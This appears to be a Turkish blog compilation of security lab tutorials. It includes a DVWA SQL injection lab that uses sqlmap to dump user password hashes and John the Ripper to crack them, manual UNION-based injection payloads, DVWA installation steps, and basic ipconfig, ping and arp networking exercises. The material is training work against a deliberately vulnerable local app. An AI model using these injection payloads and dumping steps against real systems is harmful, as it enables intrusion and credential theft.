SQL Web Enjeksiyonu

Adım 1: DVWA web sitesine bağlanın ve ilk saldırınızı gerçekleştirin.

Bir önceki gönderide  Kali PC’nin localhost’una DVWA sisteminin nasıl kurulacağını anlatmıştım. Şimdi SQL Enjeksiyonu atağını hem sqlmap aracını kullanarak hem de manuel olarak nasıl gerçekleştirebileceğimize bakacağız.

Kali PC üzerinde şu adımları gerçekleştirin.

  1. Wireshark’ı loopback arayüzünden başlatın.
  2. DVWA sitesine dönün ve DVWA Security sekmesinden güvenlik düzeyini Low yaparak Submit’e tıklayın.
  3. SQL Injection sekmesine gelin. Metin kutusuna 4 yazın ve ENTER’a basın.
  4. Wireshark’a dönün ve yakalamayı durdurun.
  5. Dördüncü sıradaki Get isteğine tıklayın ve genişletin.
  6. Ağaç kısmında Full Request URL girdisine sağ tıklayın. Copy seçeneğine ve As Filter seçeneğine tıklayın.1
  7. Terminal’i açın ve sqlmap -u komutundan sonra kopyaladığınız veriyi yapıştırın. (http.request.full.uri== kısmını silmeyi unutmayınız.) ENTER’a basın.
  8. 302 tane yönlendirme yapılsın mı? sorusu geldiğinde y tuşuna basın.
  9. Wireshark ekranına dönün. Cookie bilgisine sağ tıklayın ve Copy | as Filter seçeneğini seçin.2.png
  10. Terminal ekranında işlem bittiği zaman yukarı ok tuşuna basın ve önceki yazdığınız komutun yanına –cookie parametresini ekleyin. Kopyaladığınız bilgiyi yanına yapıştırın. (http.cookie== silmeyi unutmayınız.) Yapıştırdıktan sonra –dbs parametresini yazdıktan sonra ENTER’a basın.
  11. Diğer DBMS’lere özgü test yüklerini atlamak için y tuşuna basın.
  12. Kalan testlere MySQL testleri dahil etmek için y tuşuna basın.
  13. Sonraki soruda n tuşuna basın.1
  14. Yukarı ok tuşuna basarak önceki yazdığınız komutu getirin. Sonundaki –dbs parametrisini silin yerine -D dvwa yazın ve ENTER’a basın.
  15. Tekrar yukarı ok tuşuna basın. Komutun sonuna –tables yazın ve ENTER’a basın.2.png
  16. Yukarı ok tuşuna basın. –tables parametresini silin. -T users –columns parametresini yazın ve ENTER’a basın.3.png
  17. Yukarı ok tuşuna basın. –columns parametresini silin. -C user,password –dump yazın.
  18. Karmaları geçici dosyaya kaydetmek istiyor musunuz sorusu geldiğinde n tuşuna basın.
  19. Tekrar n tuşuna basın.
  20. Artık elinizde parolalara ait karmalar mevcut. John-the-Ripper kullanarak bunları çözebilirsiniz.4.pngŞekil 5-2 SQL enjeksiyonunun sonuçları 
  21. Elde ettiğiniz karmaları kopyalayın ve leafpad’i açarak oraya yapıştırın. Dosyanızı password olarak adlandırarak Desktop’a kaydedin.
  22. Terminal ekranında john –format=raw-md5 /root/Desktop/password yazın ve ENTER’a basın.

John the Ripper’ın daha fazla parola bulup bulmadığını öğrenmek için on dakika çalışmasına izin verin.

Adım 3: İkinci atağı gerçekleştirin.

Önceki adımda SQL veritabanına bilgileri geçirerek ve bilgi alarak hassas verileri yakaladınız. Şimdi kimlik doğrulamanızı tamamlamanıza ve yönetici olarak oturum açmanıza izin verecek olan basit bir SQL enjeksiyonu atağı gerçekleştireceksiniz.

  1. Web tarayıcısına dönün. DVWA sitesinde SQL Injection sekmesine tıklayın.
  2. User ID kutusuna ‘1 OR 1=1# yazın ve ENTER’a basın.1.png

Üst tırnak işareti veri tabanlarında belirli işlemler için ayrılmış özel bir karakterdir ve kullanıcı adı veya parola girilmesi beklenmez. Sonuç olarak size bir hata verecektir.

  1. Tablodaki kolon sayısını bulmak için User ID kutusuna 1′ or 1=1 union select 1,2′ yazın. 1′ or 1=1 union select 1,2,3,4,5′ sorgusu yapıldığında aşağıdaki hata alınmıştır:

The used SELECT setatements have a different number of columns.

Demek ki kolon sayısı 5’ten küçükmüş. Yeni sorguda daha az kolon sayısı ile union yapılmıştır. Kolon sayısının 2 olduğu aşağıdaki gibi tespit edilmiştir.2.png

  1. Veri tabanı versiyonu ve kullanıcılarını öğrenmek için 1′ or 1=1 union all select @@version,user()’ yazın.3.png
  2. MySQL veri tabanında yer alan tablo adlarını sorgulamak için SELECT table_name FROM information_schema.tables; komutu kullanılır. Burada tablo isimlerine ulaşmak için şu komutu kullanın: 1′ OR 1=1 UNION SELECT null, table_name FROM INFORMATION_SCHEMA.tables#4.png
  3. User karakter dizisi ile başlayan tablo isimlerini elde etmek için 1′ OR 1=1 UNION SELECT null, table_name FROM INFORMATION_SCHEMA.tables WHERE table_name LIKE ‘user%’# mysql sorgusunu kullanın.5.png
  4. Elde edilen bilgiler ışığında 1′ OR 1=1 UNION SELECT null, column_name FROM INFORMATION_SCHEMA.columns WHERE table_name=’users’# SQL sorgusunu kullanarak users tablosundaki kolonlara ulaşın.6.png
  5. Tablo isimleri ve tablolardaki kolon isimleri ele geçirildiğinden dolayı, users tablosundan kullanıcı adı ve parolaları 1′ OR 1=1 union select user, password from users# sorgusu ile çekin.7.png

(Bu Lab İçin Yardımcı Kaynak: Uygulamalarla Siber Güvenliğe Giriş – Alparslan Akyıldız)

Adım 4: Kali PC’den çıkış yapın.

 

Author: Ayşenur BURAK

Kali PC’nin Localhost’una DVWA Kurulumu

DVWA (Damn Vulnerable Web Application), web uygulama güvenliği alanında kendini geliştirmek isteyenler için özel olarak tasarlanan bir eğitim sistemidir. Bulundurduğu açıklar sayesinde güvenlikçilerin kimseye zarar vermeden kendi bilgisayarlarında deneme yapmalarına izin verir. Bulundurduğu açıklar şunlardır:

Capture.PNG

DVWA kurulumu anlatılırken öncesinde Kali Linux’u sanal makinenize kurduğunuz ve apt-get update && apt-get upgrade && apt-get dist-upgrade komutunu çalıştırdığınız varsayılacaktır.

Adım 1: Sitesinden DVWA dosyasını indirin.

Şu linkten Downloads kısmına gelin ve DVWA-master.zip dosyasını sanal makinenize indirin.

Adım 2: İndirdiğiniz dosyaya sağ tıklayarak Extract Here seçeneğini seçin.

Adım 3: Terminal sekmesini açın ve chmod -R 777 /var/www/html/ komutunu çalıştırarak belirtilen dizine izin verin.

Adım 4: Genişlettiğiniz dosyanın ismini DVWA olarak değiştirin ve dosyayı /var/www/html dizinine kopyalayın.

Adım 5: Terminal ekranında service apache2 start komutu ile Apache servisini başlatın.

Adım 6: Sisteminizde MySQL kurulu ise service mysql start, MariaDB kurulu ise systemctl start mariadb komutu ile veritabanını başlatın.

Adım 7: Yine terminal ekranında şu komutları yazın:

  1. mysql -u root -p (eğer mysql kurulu ise ve siz bir parola ayarlamadıysanız muhtemelen parola boştur ve direkt ENTER tuşuna basmanız yeterli olacaktır.)

NOT: 2, 4 ve 5. adımları Mysql kullanıyorsanız yapmanıza gerek yok. Ama benim gibi MariaDB kullanıyorsanız yapmalısınız.

2. use mysql;

3. create database dvwa;

4. create user dvwa@localhost;

5. grant all on dvwa.* to dvwa@localhost identified by ‘ ‘; //İki tırnak arasında boşluk koymayınız.

6. flush privileges;

7. exit;

Adım 8: /var/www/html/DVWA dizinine gelin (klasörler üzerinden gelebilirsiniz). config klasörünün içersindeki dosyayı yeniden adlandırarak config.inc.php yapın.

Adım 9: Yeniden adlandırdığınız dosyaya çift tıklayın ve aşağıdaki gibi değiştirin:

Capture.PNG

Adım 10: Artık tarayıcınızın adres çubuğuna localhost/DVWA/login.php yazarak admin kullanıcı adı ve password parolası ile giriş yapabilirsiniz. Eğer setup ekranı gelirse Create/Reset Database butonuna basınız.

Capture.PNG

PART I AĞ TEMELLERİ: AĞLAR NASIL ÇALIŞIR?

        Bir ağın güvenliğini sağlamak zor bir iştir ve göz önünde bulundurulması gereken birçok husus vardır. Var olan güvenlik açıklarının ve bunlara karşılık gelen tehditlerin farkında olmalıyız ve bu açıklar üzerindeki olabilecek tehdidin davranışını tahmin etmeliyiz. Riski taşımak, hafifletmek veya önlemek için önlemler almalıyız. Bununla birlikte, riski en aza indirgemek ve ağımızın muhtemel saldırganları ile başa çıkmak için planlar geliştirmeliyiz. Ancak, ağımızı saldırganlardan korumadan önce, ağı tanımalıyız ve ideal olarak, onlardan çok daha iyi tanımalıyız. Ağın ne yaptığını ve nasıl yaptığını öğrenmek zorundayız. Bu nedenle ağımızın yetenek ve sınırlamaları hakkında bir anlayış geliştirebiliriz. İşte o zaman hakikaten ağımızın güvenlik açıklarını görebiliriz ve onu korumak için gereken şeyi yapabiliriz. Eğer nasıl çalıştığını bilmezsek koruyamayız.

Bölüm I; aygıtların yerel ağ bağlantısında nasıl iletişim kurduğunu, IP adreslemeyi, yönlendirmeyi (routing), üç-yönlü el sıkışmasını (three-way handshake) ve bazı temel ağ uygulamalarını kapsamaktadır. Ayrıca, ping, arp, nslookup ve Wireshark gibi kitabın geri kalanında kullanılacak araçları da tanıtacaktır.

Bu bölüm, TCP/IP protokol yığınının farklı yönlerini ele alan üç kısma ayrılmıştır. Birinci Kısım, ağ erişimine ve Internet katmanına ilişkin alıştırmaları kapsar. İkinci Kısım, taşıma katmanı ile ilgilenir ve Üçüncü Kısım, uygulama katmanını ele alır. Bu bölümdeki alıştırmaları yaparken, sürekli kendinize şu soruyu sormalısınız: Bu ağ ne tür saldırılara karşı savunmasızdır ve bu saldırılar nasıl engellenir? Çalışma yapısını öğrenirken bir şeylerin nasıl kırıldığını düşünmek garip gibi görünebilir, ancak bu, bir saldırganın düşünce biçimini anlayabilmek için iyi bir fırsattır.

 

ÇN: Bu dokümanda, bazı kelime ya da kelime gruplarının yanlarında parantez içerisinde İngilizce karşılıkları da mevcuttur. Bunun nedeni, birçok yerde (örneğin CMD’de) bu kelimelerin İngilizcesinin olmasıdır.

 

   Laboratuvarlar

  • Lab 1.1 Ağ İş İstasyonu İstemci Yapılandırması

Lab 1.1w Windows İstemci Yapılandırması

Lab 1.1l Linux İstemci Yapılandırması

Lab 1.1 Analiz Soruları

Lab 1.1 Anahtar Terimler Sınavı

  • Lab 1.2 Bilgisayar Adı Çözümlemesi

Lab 1.2w Windows’ta Ad Çözümlemesi

Lab 1.2 Analiz Soruları

Lab 1.2 Anahtar Terimler Sınavı

  • Lab 1.3 IPv6 Temelleri

Lab 1.3w Windows’ta IPv6 Temelleri (netsh/ping6)

Lab 1.3 Analiz Soruları

Lab 1.3 Anahtar Terimler Sınavı

 

BÖLÜM 1- Workstation Ağ Yapılandırması Ve Bağlantısı

Bu bölüm, İletim Denetimi Protokolü/Internet Protokolü (TCP/IP) temelli bir ağda, workstation* bağlantısını kurmak için kullanılan çeşitli komutları ve yöntemleri göstermek üzere tasarlanmış laboratuvar alıştırmaları içerir. Hem Windows hem de Linux tabanlı PC’leri kullanarak ağ bağlantısını elde etmek ve izlemek için gerekli temel bilgileri kapsar. Bu bölümde, iş istasyonundaki ağ ayarlarını değiştirmenize ve izlemenize olanak tanıyan bazı temel komutlar ve araçlar tanıtılacaktır. Bu, bağlantıların nasıl korunacağının öğrenilmesine yönelik ilk adım olarak gereklidir.

“Yürümeden önce emeklemeyi ve koşmadan önce yürümeyi öğrenme” öncülü üzerine kurulmuş olan bu bölüm, emekleme aşamasını temsil eder. Bu bölüm önemlidir çünkü gelişimin sonraki aşamalarında “yürümek” ve “koşmak” için gereken becerileri sağlar.

Laboratuvar kurulumunuza ve diğer faktörlere bağlı olarak, bu kitapta sunulan tüm laboratuvar çalışmalarını gerçekleştirmeniz gerekmez. Bu nedenle, hangi laboratuvar alıştırmalarının sizin için alakalı olduğunu belirlemenize yardımcı olması için, her bir laboratuvar egzersiz numarasına bir harf eklenir: “w” laboratuvarı, Windows ortamı kullanılarak, “l” laboratuvarı Linux ortamı kullanılarak, “m” laboratuvarı Windows ve Linux’un birleşimi kullanılarak oluşturulmuştur ve “i” laboratuvarları ise internet bağlantısı gerektirir.

 

  • NOT: Workstation (İş İstasyonu): Bilgisayar ağında yönetici olmayan bilgisayarlardır. Terminal veya istemci (client) olarak da isimlendirilir. Eskiden sunucu ve istemcinin aynı işletim sistemine sahip olması gerekirken şu anda bu zorunluluk ortadan kalkmıştır.
  • NOT: Host (ana) bilgisayarlar ise ağdaki yönetici olan bilgisayarlara verilen addır.

 

Lab 1.1: Ağ Workstation İstemci Yapılandırması

İki bilgisayarın bir TCP/IPv4 ağında iletişim kurması için (IPv6, daha sonra Lab 1.3’de açıklanacaktır), her iki bilgisayarın da benzeri olmayan bir Internet Protokolü (IP) adresi olmalıdır. Bir IP adresi dört tane sekiz bitlik sayıdan oluşur. IP adresi; ağ adresi (network address) ve düğüm adresi (host address) olarak ikiye ayrılmıştır. Düğümler bilgisayarlar olarak düşünülebilir. Alt ağ maskesi (subnet mask), IP adresinin hangi bölümünün ağ adresi olduğunu ve hangi bölümünün host adresi olduğunu belirler. Yerel alan ağında (Local Area Network-LAN) her bilgisayarın aynı ağ adresi ve farklı bir host adresi olması gerekir. LAN dışında kalan farklı bir ağdaki bir cihaz ile iletişim kurmak, varsayılan bir yönlendirici (gateway) gerektirir. Bir TCP/IP ağına bağlanmak için, normalde dört öğe yapılandırılır: IP adresi (bu hem ağ bölümü hem de düğüm bölümüdür), alt ağ maskesi, bir Alan Adı Sistemi (Domain Name System – DNS) sunucusu için IP adresi ve yönlendirici için IP adresi. Aynı LAN içinde iletişim kurmak için IP adresi ve alt ağ maskesi gerekli iken; diğer ağlarla iletişim kurmak için ise yönlendiriciye ihtiyaç vardır. Farklı sitelere ve ağlara onların alan adlarını kullanarak bağlanmak istiyorsanız, o DNS sunucusunun adresine de sahip olmanız gerekir.

Farklı ağlardaki düğümler arasında iletişim kurarken, paketler, LAN’a bağlı olan varsayılan yönlendirici üzerinden gönderilir. Yönlendirme, IP adresleri kullanılarak yapılır (3. Katmanda gerçekleşir). Bilgisayarlar aynı ağda ise, iletişim kurmak için kaynak IP adresi hedef bilgisayarın Ortam Erişim Denetimi (Media Access Control-MAC) adresine dönüştürülür (2. Katmanda gerçekleşir). MAC adresleri, kartı yapan firmalar tarafından Ethernet kartlarına sabit olarak kodlanır.

IP yapılandırmasını değiştirme yeteneği önemli bir beceridir. Bu laboratuvarda, yapılandırma bilgilerini görüntülemek için Windows’ta ipconfig komutunu ve Linux’te ifconfig komutunu kullanacaksınız. Ardından, IP adresini değiştirmek için; Windows’ta Yerel Ağ Bağlantısı Özellikleri penceresini, Linux’te yine ifconfig komutunu kullanacaksınız.

Bilgisayarlar, ağlar arasında birbirleriyle iletişim kurmak için hem MAC hem de IP adreslerini kullanmaktadır. Bu laboratuvarda, iki bilgisayar birbirleri ile ping mesajları üzerinden “konuşacak”. Ardından, bir makinenin IP ve MAC adresleri arasındaki ilişkiyi göstermek için bir bilgisayarın Adres Çözümleme Protokolü (Address Resolution Protocol-ARP) tablosunu değiştireceksiniz.

Ping (Packet Internet Groper) programı, iki bilgisayar arasındaki bağlantıyı test etmek için kullanılan faydalı bir yardımcı programdır. Ping kelimesi, denizaltıdaki bir sonarın sesinden türetilmiştir ve benzer yolu kullanır. Sabit bir “mesafe” boyunca hedefin varlığını araştırmak için “sinyal” gönderir. İki bilgisayar arasındaki mesafe, Yaşamak İçin Zaman (Time To Live-TTL) kullanılarak ölçülebilir. TTL, geçtiği her yönlendirici için bir azalma gösterir, ayrıca el-aktarma noktası (Hand Off Point) olarak da bilinir. Yönlendirici onu bir saniyeden fazla tutarsa, birden fazla azaltılır, ki bu durum da nadiren geçerlidir. Ping, bağlantıyı test etmek için Internet Denetim İletisi Protokolü (Internet Control Message Protocol-ICMP) kullanır; bu nedenle, ICMP’nin yasaklandığı durumlarda ping yardımcı programı yararlı olmayabilir. Diğer alternatifler mevcut olmasına rağmen ping, genellikle ICMP mesajlarını kullanır.

Bu laboratuvarda ping komutunu kullandığınızda, IP adresini ping hedefi olarak kullanıyor olmanıza rağmen, aslında onun o bilgisayarla iletişim kurmak için kullanılan MAC adresi olduğunu göreceksiniz. IP adresleri, bir ağdaki cihazdan diğer bir ağdaki cihaza veri aktarmak için kullanılırken, MAC adresleri aynı ağdaki bir cihazdan diğerine bilgi göndermek için kullanılır. IP adreslerini ilişkili MAC adreslerine dönüştüren ARP’dir. ARP, ARP ön belleğini (ARP cache) değiştirmek için kullanılan bir TCP/IP aracıdır. ARP ön belleği, ağdaki IP düğümlerinin yakın zamanda dönüştürülmüş MAC adreslerini içerir. ARP protokolünü görüntülemek ve değiştirmek için kullanılan yardımcı program ayrıca ‘arp’ olarak adlandırılır.

Laboratuvarlar ilerledikçe, bilgisayarın iletişim kurmak için MAC adreslerini ve IP adreslerini nasıl elde ettiğini göreceksiniz. Sizin göz önünde bulunduracağınız soru ise şudur: Bilgisayarlar, tüm bu bilgilerin hatasız bir şekilde iletildiğinden nasıl emin olabiliyor?

 

Öğrenim Amaçları

Bu laboratuvarı tamamladıktan sonra;

  • Komut satırından IP adres yapılandırma bilgilerini geri alabilirsiniz.
  • ipconfig (Windows için) veya ifconfig (Linux için) komutları ile anahtarları listeleyebilirsiniz.
  • Bir ağ kartını belirli bir IP adresini kullanacak şekilde yapılandırmak için Windows grafiksel kullanıcı arayüzünü (GUI) kullanabilirsiniz.
  • Makinenizin MAC adresini belirleyebilirsiniz.
  • Makinenizin DNS adresi ve yönlendirici adresi de dahil olmak üzere atanan ağ kaynaklarını belirleyebilirsiniz.
  • Belirtilen bir IP adresiyle bir ağ kartını yapılandırmak için ifconfig komutunu (Linux için) kullanabilirsiniz.
  • İki bilgisayar arasındaki ağ bağlantısını nasıl test edeceğinizi anlayabilirsiniz.
  • Ping komutuna eklenebilecek seçenekleri listeleyerek işlevselliğini artırabilirsiniz.
  • Bilgisayarda ARP önbelleğini görüntüleyebilir ve yönetmek için arp komutunu kullanabilirsiniz.

 

  • 10 DAKİKA

 

Lab 1.1w: Windows İstemci Yapılandırması

Malzemeler ve Kurulum

Aşağıdakilere ihtiyacınız olacaktır:

  • Windows 10
  • Windows 2016 Server

 

Laboratuvar Adımlarına Kısa Bir Bakış

Adım 1: Windows 10 PC’yi ve Windows 2016 Server’ı başlatın. Yalnızca Windows 10 PC’ye giriş yapın.

Adım 2: ipconfig komutunu kullanarak ağ kartı yapılandırmasını görüntüleyin.

Adım 3: Windows 10 makinesinin IP adresini değiştirin.

Adım 4: Yeni IP adresini doğrulayın. IP adresinin değiştiğini doğrulamak için ipconfig komutunu kullanın.

Adım 5: Windows 10 makinesinin IP adresini orijinal adresine geri döndürün.

Adım 6: Windows 10 makineden Windows 2016 Server makineye ping atın.

Adım 7: ARP tablosunu görüntüleyin ve değiştirin.

Adım 8: Windows 10 PC’nin oturumunu kapatın.

 

Laboratuvar Adımları

Adım 1: Windows 10 PC’yi ve Windows 2016 Server’ı başlatın. Yalnızca Windows 10 PC’ye giriş yapın.

Windows 10 PC’de oturum açmak için aşağıdaki adımları izleyin:

  1. Oturum açma ekranında Yönetici simgesine tıklayın.
  2. Parola metin kutusuna adminpass yazın ve ENTER tuşuna basın. (buradaki bilgisayarın admin parolası adminpass olarak belirlenmiştir)

 

Adım 2: ipconfig komutunu kullanarak ağ kartı yapılandırmasını görüntüleyin.

Windows 10 PC’de, ipconfig kullanarak ağ kartı yapılandırmasını görüntüleyin. Bu komut, yöneticilerin ağ kartı ayarlarını görüntülemesine ve değiştirmesine olanak tanır.

  1. Komut istemini açmak için, Windows logo tuşuna tıklayın; Programları Ve Dosyaları Ara kutucuğuna cmd yazın ve ENTER tuşuna basın.
  2. Komut istemine ipconfig /? yazın ve ENTER’a basın.
  3. ipconfig için mevcut seçenekleri gözlemleyin. Tüm bilgileri görmek için ekranı yukarı kaydırmanız gerekebilir.
  4. Bir yönetici için hangi seçeneklerin en yararlı olacağını düşünüyorsunuz?
  5. Dinamik Bilgisayar Yapılandırma Protokolü (Dynamic Host Configuration Protocol) sunucusundan bir IP yapılandırması almak için hangi seçeneği kullanırsınız?
  6. Şekil 1-1’de gösterildiği gibi ipconfig yazarak ENTER’a basın.
  7. IP adresiniz nedir?
  8. Alt ağ maskeniz (subnet mask) nedir?
  9. Komut satırına ipconfig /all yazın ve ENTER tuşuna basın.
  10. Yeni bilgileri gözlemleyin.
  11. Bilgisayarınızın MAC adresi (fiziksel adres) nedir?
  12. DNS sunucusu adresiniz nedir?
  13. exit yazın ve ENTER’a basın.

1.PNGŞEKİL 1-1 ipconfig komutu

Adım 3: Windows 10 makinesinin IP adresini değiştirin.

Yerel Ağ Bağlantısı Özellikleri iletişim kutusuna erişecek ve IP adresinin host adresi bölümünü değiştireceksiniz.

  1. Windows logo tuşu | Kontrol Paneli | Ağ ve İnternet | Ağ ve Paylaşım Merkezi’ni tıklayın.
  2. Adaptör ayarlarını değiştir’e tıklayın.
  3. Yerel Alan Bağlantısı’na sağ tıklayın ve Özellikler seçeneğini seçin.
  4. Internet Protokolü Sürüm 4’ü (TCP/IPv4) seçin ve Özellikler’e tıklayın.
  5. IP Adresi metin kutusunda, Şekil 1-2’de gösterildiği gibi IP adresini görürsünüz. (Ya da görmeyebilirsiniz. Bu durumda ipconfig komutunu kullanarak IP adresinizi öğrenip buraya yazabilirsiniz) Son sekizliği (159) 195 olarak değiştirin.
  6. Tamam’a tıklayın.
  7. Yerel Ağ Bağlantısı Özellikleri penceresinde Kapat’a tıklayın.
  8. Ağ Bağlantıları penceresini kapatın.

Capture.PNG

ŞEKİL 1-2 Internet Protokolü (TCP/IP) Özellikler penceresi

 

Adım 4: Yeni IP adresini doğrulayın. IP adresinin değiştiğini doğrulamak için ipconfig komutunu kullanın.

  1. Komut istemini açmak için, Windows logo tuşuna tıklayın; Programları ve dosyaları ara kutusuna cmd yazın ve ENTER tuşuna basın.
  2. ipconfig yazıp ENTER tuşuna basın.
  3. IP adresinizin değiştiğini gözlemleyin.
  4. exit tuşuna basın.

 

Adım 5: Windows 10 makinesinin IP adresini orijinal adresine geri değiştirin.

  1. Windows logo tuşu | Kontrol Paneli | Ağ ve İnternet | Ağ ve Paylaşım Merkezi.
  2. Adaptör ayarlarını değiştir’i tıklayın.
  3. Yerel Alan Bağlantısı’na sağ tıklayın ve Özellikler seçeneğini seçin.
  4. Internet Protokolü Sürüm 4’ü (TCP/IPv4) seçin ve Özellikler’i tıklayın.
  5. IP Adresi metin kutusunda, Şekil 1-2’de gösterildiği gibi 192.168.2.195 IP adresini görürsünüz. Son sekizliği (195) 159 olarak değiştirin.
  6. Tamam’a tıklayın.
  7. Yerel Ağ Bağlantısı Özellikleri penceresinde Kapat’ı tıklayın.
  8. Ağ Bağlantıları penceresini kapatın.

 

Adım 6: Windows 10 PC’den Windows 2016 Server’a Ping Atın.

  1. Windows 10 PC’de Windows logo tuşuna tıklayın; Programları ve dosyaları ara kutusuna cmd yazın ve ENTER tuşuna basın.
  2. ping yardım dosyasını görüntülemek için, ping /? komutunu yazın ve ENTER tuşuna basın.
  3. Windows 2016 Server bilgisayarının IP adresine ping işlemi yapmak için Şekil 1-3’te gösterildiği gibi, komut satırına ping 192.168.2.169 yazın ve ENTER tuşuna basın.
    1. Görüntülenen bilgileri gözlemleyin.
    2. Dört yanıt için gözlemlenen zaman değeri nedir?
    3. TTL Ne görülmektedir?
    4. Bu sayı ne ifade ediyor?
    5. Bu yanıtın aslında doğru bilgisayardan geldiğinden nasıl emin olabilirsiniz?

 

  • NOT: Eğer bir ana makineden bir sanal makineye ping atacaksanız, sanal makinenin ağ ayarlarından NAT ağını değil Köprü Bağdaştırıcısı’nı seçmelisiniz. Ayrıca sanal makinenin güvenlik duvarı ayarlarından Dosya Paylaşımı’na izin veren tüm kutucukları işaretleyerek dosya paylaşımına izin vermelisiniz.
  • NOT: Eğer iki sanal makine arasında ping işlemi uygulayacaksanız her iki sanal makinenin ağ ayarlarında NAT ağını seçmelisiniz.

1.PNG

ŞEKİL 1-3 Windows ping komutu

  1. Adım: ARP tablosunu görüntüleyin ve değiştirin.

Windows 10 makinesinde, arp yardımcı programını kullanarak ARP ön belleğini görüntüleyeceksiniz.

  1. Geçerli Komut İstemi penceresini kapatın.
  2. Windows logo tuşu | Tüm Programlar | Donatılar’ı tıklayın ve ardından Komut İstemi ‘ne sağ tıklayıp yönetici olarak çalıştırın .
  3. Yönetici olarak çalıştır’ı tıklayın.
  4. Kullanıcı Hesabı Denetimi iletişim kutusunda Evet’i tıklayın.
  5. Komut satırına arp /? yazın ve ENTER tuşuna basın.
  6. Bu komut için seçenekleri gözlemleyin.
  7. Hangi komut geçerli ARP girdilerini gösteriyor?

 

  • İpucu: İhtiyacınız olduğunda aynı kelimeyi yalnızca birkaç küçük harfle yazmak için yukarı ok tuşuna basarak yazmış olduğunuz önceki komutu gösterebilirsiniz. Ardından komutu yeni seçeneklerle kolayca değiştirebilirsiniz.
  1. Komut satırına arp -a yazın ve ENTER’a basın.
  2. Windows 2016 Server makinesinin MAC adresinin listelendiğine dikkat edin.
  3. Komut satırına arp -d yazın ve ENTER’a basın. (-d seçeneği ARP önbelleğini siler.)
  4. Girişleri gözlemleyin. (Listelenen herhangi bir kayıt yoksa endişelenmeyin; bu komutla yalnızca ARP önbelleğinde olanlar silinir.)
  5. Şekil 1-4’te gösterildiği gibi komut satırına arp -a yazıp ENTER tuşuna basın.
  6. ARP önbelleğinde artık hiçbir kayıt olmadığını gözlemleyin.
  7. Komut satırına ping 192.168.2.169 yazın ve ENTER tuşuna basın.
  8. Komut satırına arp -a yazın ve ENTER tuşuna basın.
    1. Kayıtları gözlemleyin. MAC adresinin bir kez daha listelendiğine dikkat edin.
    2. Ping komutu kullanılarak makinenin MAC adresinin ARP önbelleğinde listelenmesi nasıl sağlanır? (Bu, Bölüm 2’deki Lab 2.1, Ağ İletişim Analizi’nde incelenmiştir.)
    3. Bunun aslında bilgisayarın doğru MAC adresi olduğuna nasıl emin olabilirsiniz?

1.PNGŞEKİL 1-4 Windows’ta arp komutu

 

  1. Adım: Windows 10 PC’den oturum kapatın.

Windows 10 PC’de şu adımları izleyin:

  1. Windows logo tuşu | Kapatma oku | Oturumu Kapat.
  2. Windows iletişim kutusunda Oturumu Kapat’a tıklayın.

 

Lab 1.1l: Linux İstemci Yapılandırması

Malzemeleri ve Kurulumu

Aşağıdakilere ihtiyacınız olacaktır:

  • Kali
  • Metasploitable

Laboratuvar Adımlarına Kısa Bir Bakış

Adım 1: Kali ve Metasploit PC’leri başlatın. Sadece Kali PC’ de oturum açın.

Adım 2: ifconfig kullanarak ağ kartı yapılandırması görüntüleyin.

Adım 3: DNS adresini belirlemek ve resolv.conf dosyasını görüntülemek için cat komutunu kullanın.

Adım 4: Yönlendiricinin adresini belirlemek için netstat -nr komutunu kullanın.

Adım 5: Bir makinenin ağ yapılandırmasını değiştirmek için ifconfig komutunu kullanın.

Adım 6: ARP tablosunu görüntüleyin.

Adım 7: Metasploitable makineye IP adresi üzerinden ping atarak önbelleği görüntüleyin.

Adım 8: ARP önbelleğini değiştirin ve tekrar ARP önbelleğini görüntüleyin.

Adım 9: Kali PC’den çıkış yapın.

 

Laboratuvar Adımları

Adım 1: Kali ve Metasploitable PC’leri başlatın. Sadece Kali PC’de oturum açın.

Kali PC’de oturum açmak için şu adımları izleyin:

  1. Oturum açma ekranında Diğer’i tıklayın.
  2. Kullanıcı adı metin kutusuna root yazın ve ENTER’a basın.
  3. Parola metin kutusuna toor yazın ve ENTER’a basın

 

Adım 2: ifconfig kullanarak ağ kartı yapılandırması görüntüleyin.

  1. Menü çubuğunda Terminal simgesini tıklayın.
  2. Komut satırında ifconfig -h yazın ve ENTER’a basın. (Bilgi, ekranı kaydırabilir, metnin tamamını görmek için ÜST KARAKTER tuşuna basılı tutun ve PAGEUP tuşuna basın.)
  3. Kullanılabilecek farklı seçenekleri gözlemleyin.
  • İpucu: Linux’ta birçok komut için, komutun yanına -h (yardım) yazarak komut hakkında bilgi alabilirsiniz. Ayrıntılı bilgi almak için komutun öncesine man komutunu yazıp ENTER tuşuna basarak manuel komutu kullanabilirsiniz. Ana programdan çıkmak için, q yazın.

Bu komutu nasıl kullanabileceğiniz aşağıda açıklanmaktadır:

  1. Komut satırında, man ifconfig yazın ve ENTER’a basın.
  2. Sayfayı kaydırmak için YUKARI OK ve AŞAĞI OK tuşlarını kullanın.
  3. Sayfaya bakmanız bitince çıkmak için q tuşuna basın.
  • İpucu: Aynı komutu birkaç kez hafif değişikliklerle yazmanız gerektiğinde, YUKARI OK tuşuna basarak yazmış olduğunuz önceki komutu gösterebilirsiniz. Ardından komutu yeni seçeneklerle kolayca değiştirebilirsiniz.
  1. Komut satırında ifconfig yazın ve ENTER’a basın.
  2. Görüntülenen bilgileri gözlemleyin.
  3. Linux IP adresini nasıl adlandırıyor? Sizin IP adresiniz nedir?
  4. Linux alt ağ maskesini nasıl adlandırıyor? Alt ağ maskeniz nedir?

 

Adım 3: DNS adresini belirlemek ve resolv.conf dosyasını görüntülemek için cat komutunu kullanın.

 

  1. Komut satırında, cat /etc/resolv.conf yazın ve ENTER’a basın.
  2. Görüntülenen bilgileri gözlemleyin.
  3. DNS sunucunuzun adresi nedir?

 

Adım 4: Yönlendiricinin adresini belirlemek için netstat -nr komutunu kullanın.

  1. Komut satırında, netstat -nr yazın ve ENTER’a basın. Görüntülenen bilgileri gözlemleyin. Varsayılan yönlendiricinin yapılandırılmamış olduğuna dikkat edin. Laboratuvar çalışmaları için gerekli tüm makineler yalnızca 192.168.2.0 ağında iletişim kuracağından, yönlendiriciye ihtiyaç yoktur. Trafiğin 192.168.2.0 dışında bir ağa gitmesi gerekiyorsa, varsayılan yönlendirici gereklidir.

 

Adım 5: Bir makinenin ağ yapılandırmasını değiştirmek için ifconfig komutunu kullanın.

  1. Komut satırına ifconfig eth0 192.168.2.134 yazın ve ENTER tuşuna basın.
  2. Komut satırına ifconfig yazın ve ENTER’a basın. IP adresiniz değişti mi?
  3. Komut satırına ifconfig eth0 192.168.2.143 yazın ve ENTER tuşuna basın.
  4. Komut satırına ifconfig yazın ve ENTER’a basın. IP adresiniz değişti mi?
